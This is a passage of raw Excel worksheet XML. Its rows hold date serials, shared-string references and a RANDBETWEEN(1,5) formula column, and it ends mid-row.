    <row r="12218" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A12218" s="1">
        <v>43305.184490740743</v>
      </c>
      <c r="C12218" t="s">
        <v>139</v>
      </c>
      <c r="E12218" s="2" t="s">
        <v>10945</v>
      </c>
      <c r="F12218">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12219" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12219" s="1">
        <v>43305.182974537034</v>
      </c>
      <c r="C12219" t="s">
        <v>71</v>
      </c>
      <c r="D12219" t="s">
        <v>312</v>
      </c>
      <c r="E12219" s="2" t="s">
        <v>10946</v>
      </c>
      <c r="F12219">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12220" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12220" s="1">
        <v>43305.142060185186</v>
      </c>
      <c r="C12220" t="s">
        <v>48</v>
      </c>
      <c r="E12220" s="2" t="s">
        <v>10947</v>
      </c>
      <c r="F12220">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12221" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12221" s="1">
        <v>43305.123483796298</v>
      </c>
      <c r="C12221" t="s">
        <v>328</v>
      </c>
      <c r="E12221" s="2" t="s">
        <v>10948</v>
      </c>
      <c r="F12221">
        <f t="shared" ca="1" si="190"/>
        <v>3</v>
      </c>
    </row>
    <row r="12222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12222" s="1">
        <v>43305.092905092592</v>
      </c>
      <c r="C12222" t="s">
        <v>6523</v>
      </c>
      <c r="D12222" t="s">
        <v>33</v>
      </c>
      <c r="E12222" t="s">
        <v>10949</v>
      </c>
      <c r="F12222">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12223" s="1">
        <v>43305.081099537034</v>
      </c>
      <c r="C12223" t="s">
        <v>41</v>
      </c>
      <c r="E12223" t="s">
        <v>10950</v>
      </c>
      <c r="F12223">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12224" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12224" s="1">
        <v>43305.055486111109</v>
      </c>
      <c r="C12224" t="s">
        <v>140</v>
      </c>
      <c r="D12224" t="s">
        <v>312</v>
      </c>
      <c r="E12224" s="2" t="s">
        <v>10951</v>
      </c>
      <c r="F12224">
        <f t="shared" ca="1" si="190"/>
        <v>5</v>
      </c>
    </row>
    <row r="12225" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12225" s="1">
        <v>43305.021145833336</v>
      </c>
      <c r="C12225" t="s">
        <v>454</v>
      </c>
      <c r="D12225" t="s">
        <v>11</v>
      </c>
      <c r="E12225" s="2" t="s">
        <v>10952</v>
      </c>
      <c r="F12225">
        <f t="shared" ca="1" si="190"/>
        <v>2</v>
      </c>
    </row>
    <row r="12226" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12226" s="1">
        <v>43305.020532407405</v>
      </c>
      <c r="C12226" t="s">
        <v>10</v>
      </c>
      <c r="D12226" t="s">
        <v>6</v>
      </c>
      <c r="E12226" s="2" t="s">
        <v>10907</v>
      </c>
      <c r="F12226">
        <f t="shared" ref="F12226:F12289" ca="1" si="191">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="12227" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12227" s="1">
        <v>43305.020486111112</v>
      </c>
      <c r="C12227" t="s">
        <v>140</v>
      </c>
      <c r="D12227" t="s">
        <v>46</v>
      </c>
      <c r="E12227" s="2" t="s">
        <v>10953</v>
      </c>
      <c r="F12227">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12228" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12228" s="1">
        <v>43304.951817129629</v>
      </c>
      <c r="C12228" t="s">
        <v>10735</v>
      </c>
      <c r="D12228" t="s">
        <v>1056</v>
      </c>
      <c r="E12228" s="2" t="s">
        <v>10954</v>
      </c>
      <c r="F12228">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12229" s="1">
        <v>43304.929282407407</v>
      </c>
      <c r="C12229" t="s">
        <v>314</v>
      </c>
      <c r="E12229" t="s">
        <v>10955</v>
      </c>
      <c r="F12229">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12230" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A12230" s="1">
        <v>43304.905381944445</v>
      </c>
      <c r="C12230" t="s">
        <v>10</v>
      </c>
      <c r="D12230" t="s">
        <v>271</v>
      </c>
      <c r="E12230" s="2" t="s">
        <v>10956</v>
      </c>
      <c r="F12230">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12231" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12231" s="1">
        <v>43304.866331018522</v>
      </c>
      <c r="C12231" t="s">
        <v>140</v>
      </c>
      <c r="D12231" t="s">
        <v>234</v>
      </c>
      <c r="E12231" s="2" t="s">
        <v>10957</v>
      </c>
      <c r="F12231">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12232" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12232" s="1">
        <v>43304.851168981484</v>
      </c>
      <c r="C12232" t="s">
        <v>140</v>
      </c>
      <c r="D12232" t="s">
        <v>141</v>
      </c>
      <c r="E12232" s="2" t="s">
        <v>10958</v>
      </c>
      <c r="F12232">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12233" s="1">
        <v>43304.795914351853</v>
      </c>
      <c r="C12233" t="s">
        <v>10</v>
      </c>
      <c r="D12233" t="s">
        <v>1036</v>
      </c>
      <c r="E12233" t="s">
        <v>10959</v>
      </c>
      <c r="F12233">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12234" s="1">
        <v>43304.729444444441</v>
      </c>
      <c r="C12234" t="s">
        <v>10</v>
      </c>
      <c r="D12234" t="s">
        <v>36</v>
      </c>
      <c r="E12234" t="s">
        <v>10960</v>
      </c>
      <c r="F12234">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12235" s="1">
        <v>43304.717997685184</v>
      </c>
      <c r="C12235" t="s">
        <v>10</v>
      </c>
      <c r="D12235" t="s">
        <v>89</v>
      </c>
      <c r="E12235" t="s">
        <v>10961</v>
      </c>
      <c r="F12235">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12236" s="1">
        <v>43304.702604166669</v>
      </c>
      <c r="C12236" t="s">
        <v>10</v>
      </c>
      <c r="D12236" t="s">
        <v>271</v>
      </c>
      <c r="E12236" t="s">
        <v>10962</v>
      </c>
      <c r="F12236">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12237" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A12237" s="1">
        <v>43304.636296296296</v>
      </c>
      <c r="C12237" t="s">
        <v>10</v>
      </c>
      <c r="D12237" t="s">
        <v>6</v>
      </c>
      <c r="E12237" s="2" t="s">
        <v>10963</v>
      </c>
      <c r="F12237">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12238" s="1">
        <v>43304.62027777778</v>
      </c>
      <c r="C12238" t="s">
        <v>10</v>
      </c>
      <c r="D12238" t="s">
        <v>6</v>
      </c>
      <c r="E12238" t="s">
        <v>10964</v>
      </c>
      <c r="F12238">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12239" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12239" s="1">
        <v>43304.611817129633</v>
      </c>
      <c r="C12239" t="s">
        <v>10</v>
      </c>
      <c r="D12239" t="s">
        <v>6</v>
      </c>
      <c r="E12239" s="2" t="s">
        <v>10965</v>
      </c>
      <c r="F12239">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12240" s="1">
        <v>43304.604525462964</v>
      </c>
      <c r="C12240" t="s">
        <v>6</v>
      </c>
      <c r="E12240" t="s">
        <v>10966</v>
      </c>
      <c r="F12240">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12241" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A12241" s="1">
        <v>43304.583090277774</v>
      </c>
      <c r="C12241" t="s">
        <v>10</v>
      </c>
      <c r="D12241" t="s">
        <v>178</v>
      </c>
      <c r="E12241" s="2" t="s">
        <v>10967</v>
      </c>
      <c r="F12241">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12242" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A12242" s="1">
        <v>43304.581967592596</v>
      </c>
      <c r="C12242" t="s">
        <v>6</v>
      </c>
      <c r="D12242" t="s">
        <v>25</v>
      </c>
      <c r="E12242" s="2" t="s">
        <v>10968</v>
      </c>
      <c r="F12242">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12243" s="1">
        <v>43304.560104166667</v>
      </c>
      <c r="C12243" t="s">
        <v>16</v>
      </c>
      <c r="E12243" t="s">
        <v>10969</v>
      </c>
      <c r="F12243">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12244" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12244" s="1">
        <v>43304.552499999998</v>
      </c>
      <c r="C12244" t="s">
        <v>10</v>
      </c>
      <c r="D12244" t="s">
        <v>6</v>
      </c>
      <c r="E12244" s="2" t="s">
        <v>10970</v>
      </c>
      <c r="F12244">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12245" s="1">
        <v>43304.498738425929</v>
      </c>
      <c r="C12245" t="s">
        <v>10</v>
      </c>
      <c r="D12245" t="s">
        <v>56</v>
      </c>
      <c r="E12245" t="s">
        <v>10971</v>
      </c>
      <c r="F12245">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12246" s="1">
        <v>43304.495034722226</v>
      </c>
      <c r="C12246" t="s">
        <v>10</v>
      </c>
      <c r="D12246" t="s">
        <v>80</v>
      </c>
      <c r="E12246" t="s">
        <v>10972</v>
      </c>
      <c r="F12246">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12247" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12247" s="1">
        <v>43304.486516203702</v>
      </c>
      <c r="C12247" t="s">
        <v>65</v>
      </c>
      <c r="E12247" s="2" t="s">
        <v>10973</v>
      </c>
      <c r="F12247">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12248" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12248" s="1">
        <v>43304.475115740737</v>
      </c>
      <c r="C12248" t="s">
        <v>41</v>
      </c>
      <c r="E12248" s="2" t="s">
        <v>10974</v>
      </c>
      <c r="F12248">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12249" s="1">
        <v>43304.473506944443</v>
      </c>
      <c r="C12249" t="s">
        <v>10</v>
      </c>
      <c r="D12249" t="s">
        <v>92</v>
      </c>
      <c r="E12249" t="s">
        <v>10975</v>
      </c>
      <c r="F12249">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12250" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12250" s="1">
        <v>43304.473171296297</v>
      </c>
      <c r="C12250" t="s">
        <v>10</v>
      </c>
      <c r="D12250" t="s">
        <v>92</v>
      </c>
      <c r="E12250" t="s">
        <v>10976</v>
      </c>
      <c r="F12250">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12251" s="1">
        <v>43304.468784722223</v>
      </c>
      <c r="C12251" t="s">
        <v>10</v>
      </c>
      <c r="D12251" t="s">
        <v>107</v>
      </c>
      <c r="E12251" t="s">
        <v>10977</v>
      </c>
      <c r="F12251">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12252" s="1">
        <v>43304.462187500001</v>
      </c>
      <c r="C12252" t="s">
        <v>6</v>
      </c>
      <c r="D12252" t="s">
        <v>821</v>
      </c>
      <c r="E12252" t="s">
        <v>10978</v>
      </c>
      <c r="F12252">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12253" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A12253" s="1">
        <v>43304.439155092594</v>
      </c>
      <c r="C12253" t="s">
        <v>41</v>
      </c>
      <c r="E12253" s="2" t="s">
        <v>10979</v>
      </c>
      <c r="F12253">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12254" s="1">
        <v>43304.435277777775</v>
      </c>
      <c r="C12254" t="s">
        <v>907</v>
      </c>
      <c r="E12254" t="s">
        <v>10980</v>
      </c>
      <c r="F12254">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12255" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12255" s="1">
        <v>43304.431666666664</v>
      </c>
      <c r="C12255" t="s">
        <v>65</v>
      </c>
      <c r="E12255" s="2" t="s">
        <v>10981</v>
      </c>
      <c r="F12255">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12256" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12256" s="1">
        <v>43304.423101851855</v>
      </c>
      <c r="C12256" t="s">
        <v>48</v>
      </c>
      <c r="D12256" t="s">
        <v>312</v>
      </c>
      <c r="E12256" s="2" t="s">
        <v>10982</v>
      </c>
      <c r="F12256">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12257" s="1">
        <v>43304.417118055557</v>
      </c>
      <c r="C12257" t="s">
        <v>10</v>
      </c>
      <c r="D12257" t="s">
        <v>6</v>
      </c>
      <c r="E12257" t="s">
        <v>10983</v>
      </c>
      <c r="F12257">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12258" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12258" s="1">
        <v>43304.392199074071</v>
      </c>
      <c r="C12258" t="s">
        <v>48</v>
      </c>
      <c r="E12258" s="2" t="s">
        <v>10984</v>
      </c>
      <c r="F12258">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12259" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12259" s="1">
        <v>43304.384606481479</v>
      </c>
      <c r="C12259" t="s">
        <v>41</v>
      </c>
      <c r="E12259" t="s">
        <v>10985</v>
      </c>
      <c r="F12259">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12260" s="1">
        <v>43304.349340277775</v>
      </c>
      <c r="C12260" t="s">
        <v>41</v>
      </c>
      <c r="F12260">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12261" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12261" s="1">
        <v>43304.280532407407</v>
      </c>
      <c r="C12261" t="s">
        <v>10</v>
      </c>
      <c r="D12261" t="s">
        <v>41</v>
      </c>
      <c r="E12261" s="2" t="s">
        <v>10986</v>
      </c>
      <c r="F12261">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12262" s="1">
        <v>43304.19736111111</v>
      </c>
      <c r="C12262" t="s">
        <v>2140</v>
      </c>
      <c r="D12262" t="s">
        <v>367</v>
      </c>
      <c r="F12262">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12263" s="1">
        <v>43304.180856481478</v>
      </c>
      <c r="C12263" t="s">
        <v>60</v>
      </c>
      <c r="E12263" t="s">
        <v>10987</v>
      </c>
      <c r="F12263">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12264" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12264" s="1">
        <v>43304.179907407408</v>
      </c>
      <c r="C12264" t="s">
        <v>344</v>
      </c>
      <c r="E12264" s="2" t="s">
        <v>10988</v>
      </c>
      <c r="F12264">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12265" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12265" s="1">
        <v>43304.172349537039</v>
      </c>
      <c r="C12265" t="s">
        <v>103</v>
      </c>
      <c r="E12265" s="2" t="s">
        <v>10989</v>
      </c>
      <c r="F12265">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12266" s="1">
        <v>43304.146249999998</v>
      </c>
      <c r="C12266" t="s">
        <v>60</v>
      </c>
      <c r="E12266" t="s">
        <v>10990</v>
      </c>
      <c r="F12266">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12267" s="1">
        <v>43304.126782407409</v>
      </c>
      <c r="C12267" t="s">
        <v>140</v>
      </c>
      <c r="D12267" t="s">
        <v>197</v>
      </c>
      <c r="E12267" t="s">
        <v>10991</v>
      </c>
      <c r="F12267">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12268" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12268" s="1">
        <v>43304.118252314816</v>
      </c>
      <c r="C12268" t="s">
        <v>41</v>
      </c>
      <c r="E12268" s="2" t="s">
        <v>10992</v>
      </c>
      <c r="F12268">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12269" s="1">
        <v>43303.97865740741</v>
      </c>
      <c r="C12269" t="s">
        <v>10</v>
      </c>
      <c r="D12269" t="s">
        <v>107</v>
      </c>
      <c r="E12269" t="s">
        <v>10993</v>
      </c>
      <c r="F12269">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12270" s="1">
        <v>43303.976724537039</v>
      </c>
      <c r="C12270" t="s">
        <v>139</v>
      </c>
      <c r="E12270" t="s">
        <v>10994</v>
      </c>
      <c r="F12270">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12271" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12271" s="1">
        <v>43303.844224537039</v>
      </c>
      <c r="C12271" t="s">
        <v>140</v>
      </c>
      <c r="D12271" t="s">
        <v>46</v>
      </c>
      <c r="E12271" s="2" t="s">
        <v>10995</v>
      </c>
      <c r="F12271">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12272" s="1">
        <v>43303.753969907404</v>
      </c>
      <c r="C12272" t="s">
        <v>6</v>
      </c>
      <c r="D12272" t="s">
        <v>25</v>
      </c>
      <c r="E12272" t="s">
        <v>10996</v>
      </c>
      <c r="F12272">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12273" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12273" s="1">
        <v>43303.712210648147</v>
      </c>
      <c r="C12273" t="s">
        <v>10</v>
      </c>
      <c r="D12273" t="s">
        <v>86</v>
      </c>
      <c r="E12273" s="2" t="s">
        <v>10997</v>
      </c>
      <c r="F12273">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12274" s="1">
        <v>43303.616053240738</v>
      </c>
      <c r="C12274" t="s">
        <v>6</v>
      </c>
      <c r="D12274" t="s">
        <v>25</v>
      </c>
      <c r="E12274" t="s">
        <v>10998</v>
      </c>
      <c r="F12274">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12275" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12275" s="1">
        <v>43303.541828703703</v>
      </c>
      <c r="C12275" t="s">
        <v>10</v>
      </c>
      <c r="D12275" t="s">
        <v>46</v>
      </c>
      <c r="E12275" s="2" t="s">
        <v>10999</v>
      </c>
      <c r="F12275">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12276" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12276" s="1">
        <v>43303.494768518518</v>
      </c>
      <c r="C12276" t="s">
        <v>48</v>
      </c>
      <c r="E12276" s="2" t="s">
        <v>11000</v>
      </c>
      <c r="F12276">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12277" s="1">
        <v>43303.305185185185</v>
      </c>
      <c r="C12277" t="s">
        <v>197</v>
      </c>
      <c r="E12277" t="s">
        <v>11001</v>
      </c>
      <c r="F12277">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12278" s="1">
        <v>43303.234270833331</v>
      </c>
      <c r="C12278" t="s">
        <v>139</v>
      </c>
      <c r="E12278" t="s">
        <v>11002</v>
      </c>
      <c r="F12278">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12279" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12279" s="1">
        <v>43303.193749999999</v>
      </c>
      <c r="C12279" t="s">
        <v>10</v>
      </c>
      <c r="D12279" t="s">
        <v>52</v>
      </c>
      <c r="E12279" s="2" t="s">
        <v>11003</v>
      </c>
      <c r="F12279">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12280" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12280" s="1">
        <v>43302.857256944444</v>
      </c>
      <c r="C12280" t="s">
        <v>454</v>
      </c>
      <c r="D12280" t="s">
        <v>107</v>
      </c>
      <c r="E12280" s="2" t="s">
        <v>11004</v>
      </c>
      <c r="F12280">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12281" s="1">
        <v>43302.707245370373</v>
      </c>
      <c r="C12281" t="s">
        <v>43</v>
      </c>
      <c r="D12281" t="s">
        <v>82</v>
      </c>
      <c r="F12281">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12282" s="1">
        <v>43302.477141203701</v>
      </c>
      <c r="C12282" t="s">
        <v>41</v>
      </c>
      <c r="E12282" t="s">
        <v>11005</v>
      </c>
      <c r="F12282">
        <f t="shared" ca="1" si="191"/>
        <v>3</v>
      </c>
    </row>
    <row r="12283" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12283" s="1">
        <v>43302.448831018519</v>
      </c>
      <c r="C12283" t="s">
        <v>454</v>
      </c>
      <c r="D12283" t="s">
        <v>367</v>
      </c>
      <c r="E12283" s="2" t="s">
        <v>11006</v>
      </c>
      <c r="F12283">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12284" s="1">
        <v>43302.350601851853</v>
      </c>
      <c r="C12284" t="s">
        <v>721</v>
      </c>
      <c r="E12284" t="s">
        <v>11007</v>
      </c>
      <c r="F12284">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12285" s="1">
        <v>43302.331759259258</v>
      </c>
      <c r="C12285" t="s">
        <v>45</v>
      </c>
      <c r="E12285" t="s">
        <v>11008</v>
      </c>
      <c r="F12285">
        <f t="shared" ca="1" si="191"/>
        <v>1</v>
      </c>
    </row>
    <row r="12286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12286" s="1">
        <v>43302.030775462961</v>
      </c>
      <c r="C12286" t="s">
        <v>10</v>
      </c>
      <c r="D12286" t="s">
        <v>163</v>
      </c>
      <c r="E12286" t="s">
        <v>11009</v>
      </c>
      <c r="F12286">
        <f t="shared" ca="1" si="191"/>
        <v>5</v>
      </c>
    </row>
    <row r="12287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12287" s="1">
        <v>43301.970648148148</v>
      </c>
      <c r="C12287" t="s">
        <v>10</v>
      </c>
      <c r="D12287" t="s">
        <v>94</v>
      </c>
      <c r="E12287" t="s">
        <v>11010</v>
      </c>
      <c r="F12287">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12288" s="1">
        <v>43301.832905092589</v>
      </c>
      <c r="C12288" t="s">
        <v>10</v>
      </c>
      <c r="D12288" t="s">
        <v>107</v>
      </c>
      <c r="E12288" t="s">
        <v>11011</v>
      </c>
      <c r="F12288">
        <f t="shared" ca="1" si="191"/>
        <v>2</v>
      </c>
    </row>
    <row r="12289" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12289" s="1">
        <v>43301.82476851852</v>
      </c>
      <c r="C12289" t="s">
        <v>10</v>
      </c>
      <c r="D12289" t="s">
        <v>89</v>
      </c>
      <c r="E12289" t="s">
        <v>11012</v>
      </c>
      <c r="F12289">
        <f t="shared" ca="1" si="191"/>
        <v>4</v>
      </c>
    </row>
    <row r="12290" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12290" s="1">
        <v>43301.741111111114</v>
      </c>
      <c r="C12290" t="s">
        <v>3994</v>
      </c>
      <c r="D12290" t="s">
        <v>2139</v>
      </c>
      <c r="E12290" s="2" t="s">
        <v>11013</v>
      </c>
      <c r="F12290">
        <f t="shared" ref="F12290:F12353" ca="1" si="192">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="12291" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12291" s="1">
        <v>43301.736516203702</v>
      </c>
      <c r="C12291" t="s">
        <v>10</v>
      </c>
      <c r="D12291" t="s">
        <v>20</v>
      </c>
      <c r="E12291" s="2" t="s">
        <v>11014</v>
      </c>
      <c r="F12291">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12292" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12292" s="1">
        <v>43301.732106481482</v>
      </c>
      <c r="C12292" t="s">
        <v>10</v>
      </c>
      <c r="D12292" t="s">
        <v>6</v>
      </c>
      <c r="E12292" s="2" t="s">
        <v>11015</v>
      </c>
      <c r="F12292">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12293" s="1">
        <v>43301.727719907409</v>
      </c>
      <c r="C12293" t="s">
        <v>16</v>
      </c>
      <c r="F12293">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12294" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12294" s="1">
        <v>43301.71638888889</v>
      </c>
      <c r="C12294" t="s">
        <v>570</v>
      </c>
      <c r="D12294" t="s">
        <v>2214</v>
      </c>
      <c r="E12294" s="2" t="s">
        <v>11016</v>
      </c>
      <c r="F12294">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12295" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12295" s="1">
        <v>43301.680127314816</v>
      </c>
      <c r="C12295" t="s">
        <v>10</v>
      </c>
      <c r="D12295" t="s">
        <v>6</v>
      </c>
      <c r="E12295" s="2" t="s">
        <v>11017</v>
      </c>
      <c r="F12295">
